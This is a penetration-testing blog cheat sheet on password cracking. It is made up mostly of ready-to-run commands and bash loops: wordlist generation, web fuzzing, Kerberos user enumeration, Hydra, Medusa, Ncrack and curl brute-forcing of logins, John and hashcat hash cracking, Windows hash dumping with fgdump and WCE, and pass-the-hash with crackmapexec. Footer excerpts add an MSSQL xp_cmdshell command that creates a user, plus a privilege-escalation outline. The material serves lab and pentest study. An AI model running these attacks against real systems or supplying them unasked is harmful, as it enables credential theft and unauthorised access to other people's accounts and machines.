Skip to main content

Password Cracking

By


Good Post: Bruteforcing using Custom Scripts
Crunch:
crunch 8 8 -t Any_Characers -o list.txt

if you want to create something like Bha!!123

crunch 8 8 -t ,@@^^%%%

, = Upper case letter
@=lower case letters
^ = special characters
%= numbers
Generating Wordlist using kwprocessor

this is used for generating random passwords that users might use as a streak on the keyboard
example: qwertyuiop[]\

git clone https://github.com/hashcat/kwprocessor.git

#Create a keyword based on routes users use to create passwords
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt

Fuzzing for Webpages
wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 

#show all responses except 404; -s --> negative responses
gobuster dir --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404

#Fuzzing Webpages ; -b negative responses; -k --> ignore certificate errors
gobuster fuzz -k --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

#Fuzzing using dirsearch 
dirsearch -u http://10.10.10.10 -e html,php,txt,asp,aspx -x 404

Fuzzing Webpages using bash 

for id in $(seq 1 10000); do
  echo "http://www.xyz.com/index.php?id=$id"
done
Bruteforcing kerberos 

Github Usernames  Github Kerbrute

./kerbrute userenum --dc 10.10.10.10 -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt

Fuzzing Hosts
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.10/ --hc 400 --hh 8193 
Subdomain Brute Force

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

*All Wordlists are from SecLists


Check for Non Existing responses, example 28 Words, so Lets grep out resposes which  gives out 28 Words as output

wfuzz -hw 28 -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

add the found url's to /etc/hosts
SubDomain Bruteforce using wfuzz

 wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.bhanu.notes" –u http://10.10.10.10/ --hc 400,301 -t 50 -c
Cracking Http-Digest Auth

hydra -l adnin -P /usr/share/wordlist/rockyou.txt 10.10.10.10 http-digest /path/

Fuzzing using Wget 

#do not crawl the pages ending with the extensions, -R 
wget -nd -r -R html,asp,php,aspx -P wordlist.txt hackingdream.net 

# crawl the pages ending with the extensions, -A
wget -nd -r -A doc,pdf,docx,xls -P wordlist.txt hackingdream.net 
Cewl for emails in the webpage

cewl -n -e http://10.10.10.10 > emails.txt 
Brute Forcing Keypass 

keepass2john keypass.kbdx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Bruteforcing Passwords - POST Using WFuzz

Intercept the admin login page request after entering Username and password & copy the FORM-LOGIN data

or 

Firefox --> go to login page --> hit f12 --> network --> enter creds --> submit --> select POST request on network tab 
--> headers tab --> click on "resend" and select "Edit and Resend" --> from there you can find the request body
use it for -d option

wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt
Reference 

Bruteforcing Passwords - POST Using WFuzz

wfuzz -X POST -u 'http://10.10.10.10/login.php' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c 

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt 

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login"  -d "user=admin&password=FUZZ" -z file,rockyou.txt  

wfuzz -c -t 64 --basic access-admin:FUZZ -u http://10.10.10.10/api/system/version -w 100k-most-used-passwords-NCSC.txt --hc 401  

Cheatsheet  Cheatsheet-2 
Brute Forcing Passwords using Curl


for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done

-------------------------------------------------------
if [ $# -ne 1 ];then
   echo "Usage: ./script <input-file>"
   exit 1
fi

while read user pass; do
curl -iL --fail --data-urlencode  user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
   if [ $? -eq 0 ];then
      echo "ok"
   elif [ $? -ne 0 ]; then
      echo "failed"
   fi
done < $1

-----------------------------------------

url="http://foo.dev/login"
for user in $(userlist_gen); do
  for pass in $(passlist_gen); do
    http_code=$(curl -L --data-urlencode  user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s)
    if [[ $http_code -eq 302 ]]; then
      echo "Success: User: '$user' Pass: '$pass'"
      break 2
    fi
  done
done

--------------------------------------------
WORKS GOOD
------------------------------------------
url="https://172.23.161.130/console"
for pass in $(cat /usr/share/wordlists/rockyou.txt); do
    http_code=$(curl -k $url -u root:"$pass" -w '%{http_code}' -o /dev/null -s)
    if [[ $http_code -ne 401 ]]; then
      echo "Success: User: root, Pass: '$pass'"
      break 2
    else
        echo "Wrong Password Root:$pass"
    fi
  done
done

WPSCAN:

wpscan --url http://192.168.0.107 -P Wordlist.txt -U wordlist.txt -t 20

wpscan --url http://10.40.10.10/ -e ap,t,u 
Hydra:

hydra -l admin -P wordlist.txt -v VICTIM_IP ftp

hydra -l username -P password_file.txt -s port -f ip_address request_method /path
hydra -l admin -P 1000_common_passwords.txt -s 8080-f 10.10.10.10 http-get /index.html


For Wordpress:

hydra -L wordlist.txt -P wordlist.txt localhost -V 192.168.0.107 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:invalid"

hydra -l username -P rockyou.txt url.com http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"

Cracking Web Page Passwords using patator

patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401


Cracking Putty Private Key.ppk

sudo apt install putty-tools

#Genrate id_rsa for ssg login, if it asks for password - Password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa

putty2john private.ppk > hash 

john --format=PuTTY --fork=4 hash -w=wordlist.txt

#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa

Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking bitlocker Recovery key using John


john --format=bitlocker-opencl -mask=?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d target_hashPWDUMP/fgdump: Used to Dump Windows Passwords,  Needs Admin Privileges to work.

you can also use bitcracker 

Cracking Recovery key with JTR



just run fgdump.exe in cmd and hashes get dumped onto a text file.
/etc/shadow Hashes 

if the hashes start with 

$1$  - MD5
_    - BSDi Extended DES
$2$ or $2a$ - Blowfish
$5$  - SHA-256
$6$  - SHA-512
Windows Credential Editor(WCE): 

wce64.exe -w
Passing the Hash to login to windows:

pth-winexe

export SMBHASH=Copy_the_NTLM_Hash_FROM_fgdump

pthwinexe -U administrator% //Victim_IP cmd

Pass the Password

crackmapexec IP_Address -u username -d domain_name -p password

crackmapexec 10.10.10.10/24 -u bhanu -d steins -p Welcome@1


Pass the Hash
Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243::  #copy the last set of hash

crackmapexec 10.10.10.10/24 -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243 --local 
Password Profiling: 

Creating Wordlists from a webpage or any source.

cewl www.website.com -m 6 -w /root/wordlist-cewl.txt
Password Mutation:

nano /etc/john/john.conf 
$[0-9]$[0-9]        /Adding a rule in John to add 2 numbers after each word

john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt
            /Apply these rules to existing passwords
Medusa:
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20
Ncrack:

ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
        /Multiple Threads should not be used
LM and NTLM Hashes:
-------------------
NT based till 2003 stored 2 diff hashes -> Lan Manager and NTLan manager

LM Hashing:  weak, password longer than 7 chars are split into 2 strings
-----------
password is converted to uppercase before being hashed. each part is hashed seperately, 
no Salts --> prone to Rainbow tables attack

NTLM Hashing: Started from Windows Vista; SAM
--------------





Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...
Post a Comment
Read more